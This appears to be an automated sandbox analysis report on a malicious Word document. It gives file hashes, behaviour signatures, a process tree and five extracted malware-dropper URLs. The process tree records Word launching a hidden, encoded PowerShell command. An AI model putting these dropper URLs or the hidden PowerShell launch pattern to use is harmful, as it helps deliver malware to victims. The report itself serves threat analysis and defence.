Analysis

  • max time kernel
    55s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-11-2024 21:30

General

  • Target

    82315a8feb90654d5bf2041a0985ceea5c88031e3b51b4e848fdcbf8270442b0.doc

  • Size

    213KB

  • MD5

    406f47c8c156a30ea84d17132744705f

  • SHA1

    f033b11daf7f60e3f2e0163559463300dc3bb256

  • SHA256

    82315a8feb90654d5bf2041a0985ceea5c88031e3b51b4e848fdcbf8270442b0

  • SHA512

    a90f036d09e971f95e8a83a8d115d0d81241b4731a11cc9745bb42a6d0ffc8a4a6777a87684b7db481904eaaf102fbe067f76b84db611fc879a456bcbadb6739

  • SSDEEP

    6144:e/2k4ytGiL3HJk9cD7bZhS/D6LWPqMuD:e/rQitkS7bZJ5MuD

Score
10/10

Malware Config

Extracted

Language: ps1

Deobfuscated: yes

URLs (exe.dropper):

  • http://peikeshargh.com/wp-admin/HXU15i/
  • http://cooklawyerllc.com/DB/XygG68105/
  • https://www.meditationmusic.shop/musicshop/MYatxrUp/
  • http://magic-in-china.com/wovltk23ld/f9aH1153/
  • http://www.ikedi.info/wp-content/x4f7893/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\82315a8feb90654d5bf2041a0985ceea5c88031e3b51b4e848fdcbf8270442b0.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2556

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CBC304E.wmf

      Filesize

      444B

      MD5

      ed003c65473703abde6ff7e7172fd55b

      SHA1

      306e4b2bfe618dc156198551b57b71330d07a6ca

      SHA256

      f9ce679643762cd5e400d33b31295af010efe108395bc8323df64b74daa6eef1

      SHA512

      f56b77f029da2d61782f516e07f2aef69939be9ba6453d45b70c5b1efc5fbbf7ddaeba7d41d36eb93682339df53eea138ec5a6ae7d76d9931f706cbe7ca87d47

    • memory/2164-21-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-2-0x000000007136D000-0x0000000071378000-memory.dmp

      Filesize

      44KB

    • memory/2164-5-0x0000000005B60000-0x0000000005C60000-memory.dmp

      Filesize

      1024KB

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-14-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-0-0x000000002F411000-0x000000002F412000-memory.dmp

      Filesize

      4KB

    • memory/2164-22-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-25-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-35-0x000000007136D000-0x0000000071378000-memory.dmp

      Filesize

      44KB

    • memory/2164-36-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-37-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2556-31-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

    • memory/2556-32-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB